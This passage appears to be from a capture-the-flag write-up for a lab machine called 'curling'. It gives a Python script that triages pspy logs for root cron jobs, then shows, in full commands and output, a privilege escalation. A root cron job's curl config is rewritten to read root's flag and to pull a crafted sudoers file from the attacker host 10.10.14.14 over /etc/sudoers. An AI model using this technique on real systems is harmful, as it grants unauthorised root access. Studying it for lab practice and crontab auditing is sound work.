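    "2020/11/30 09:38:35 CMD: UID=33 PID=1767 | /usr/sbin/apache2 -k start",
    "2020/11/30 09:38:35 CMD: UID=0 PID=1162 | /usr/sbin/sshd -D",
    "2020/11/30 09:38:35 CMD: UID=0 PID=1089 | /usr/sbin/cron -f",
    "2020/11/30 09:39:01 CMD: UID=0 PID=2441 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report",
    "2020/11/30 09:39:01 CMD: UID=0 PID=2440 | sleep 1",
    "2020/11/30 09:39:01 CMD: UID=0 PID=2439 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report",
    "2020/11/30 09:39:01 CMD: UID=0 PID=2437 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input",
    "2020/11/30 09:39:01 CMD: UID=0 PID=2436 | /usr/sbin/CRON -f",
    "2020/11/30 09:39:09 CMD: UID=??? PID=2486 | ???",
    "2020/11/30 09:39:09 CMD: UID=0 PID=2507 | find -O3 /var/lib/php/sessions/ -ignore_readdir_race -depth -mindepth 1 -name sess_* -type f -cmin +24 -delete",
    "2020/11/30 09:40:01 CMD: UID=0 PID=2527 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report",
    "2020/11/30 09:40:01 CMD: UID=0 PID=2526 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input",
    "2020/11/30 09:42:02 CMD: UID=0 PID=2543 | cat /root/default.txt",
]


def parse(lines):
    """Yield dicts with ts/uid/pid/cmd for every well-formed pspy CMD line."""
    for line in lines:
        m = PSPY_LINE.match(line.strip())
        if m:
            yield m.groupdict()


def untrusted_paths(cmd):
    """Absolute paths in a command line that live under a user-writable tree."""
    return sorted({p for p in ABS_PATH.findall(cmd) if p.startswith(UNTRUSTED_ROOTS)})


def triage(lines):
    """Group root commands that touch untrusted paths and count repetitions,
    so a cron job (same command every minute) ranks above a one-off."""
    findings = {}
    for ev in parse(lines):
        if ev["uid"] != "0":
            continue
        paths = untrusted_paths(ev["cmd"])
        if not paths:
            continue
        f = findings.setdefault(ev["cmd"], {"cmd": ev["cmd"], "paths": paths,
                                            "count": 0, "first": ev["ts"],
                                            "last": ev["ts"]})
        f["count"] += 1
        f["last"] = ev["ts"]
    return sorted(findings.values(), key=lambda f: (-f["count"], f["first"]))


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LINES
    for f in triage(lines):
        print(f"{f['count']:3}x  {f['first']} .. {f['last']}  {f['cmd']}")
        for p in f["paths"]:
            print(f"        -> {p}")
```

Run over the full pspy capture this reduces hundreds of lines to the two cron commands and the paths they touch; the same rule (privileged job, argument under a directory the low-privileged user can write) is what a defender would audit crontabs for before an attacker finds it.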
floris@curling:~/admin-area$ echo "url = \"file:///root/root.txt\"" > input
floris@curling:~/admin-area$ cat input
url = "file:///root/root.txt"
floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 ..
-rw-rw---- 1 root floris 30 Nov 30 10:25 input
-rw-rw---- 1 root floris 14236 Nov 30 10:25 report
After the next minute boundary the cron job has fired and report has been replaced by the 33-byte flag:
floris@curling:~/admin-area$ ls -la
total 16
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 Nov 30 09:34 ..
-rw-rw---- 1 root floris 30 Nov 30 10:25 input
-rw-rw---- 1 root floris 33 Nov 30 10:26 report
floris@curling:~/admin-area$ cat report
82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX
What if we want a shell? curl's config file also accepts an output = <file> line, and the job runs as root, so root's curl can be made to write an attacker-supplied file anywhere. We prepare a minimal sudoers file granting floris full sudo and serve it from our machine:
Two caveats before doing this on a real system: it works because curl opens an existing output file with truncation, so /etc/sudoers keeps its root ownership and 0440 mode (sudo refuses a sudoers file that is more permissive than that or not owned by root); and the replacement must be syntactically valid, otherwise sudo stops working for everyone, so check it first with visudo -cf sudoers.txt.
$ cat sudoers.txt
root ALL=(ALL:ALL) ALL
floris ALL=(ALL:ALL) ALL
$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.150 - - [30/Nov/2020 11:58:01] "GET /sudoers.txt HTTP/1.1" 200 -
floris@curling:~/admin-area$ echo -e 'url = "http://10.10.14.14:8080/sudoers.txt"\noutput = "/etc/sudoers"' > input
(echo -e enables interpretation of backslash escapes, so the \n becomes a line break and input gets two lines.)
floris@curling:~/admin-area$ cat input
url = "http://10.10.14.14:8080/sudoers.txt"
output = "/etc/sudoers"
After the next cron run has overwritten /etc/sudoers, floris can use sudo with the password we already know:
floris@curling:~/admin-area$ sudo su root
[sudo] password for floris:
root@curling:/home/floris/admin-area#
root@curling:/home/floris/admin-area# whoami
root
root@curling:/home/floris/admin-area# cat /root/root.txt
82c1XXXXXXXXXXXXXXXXXXXXXXXXXXXX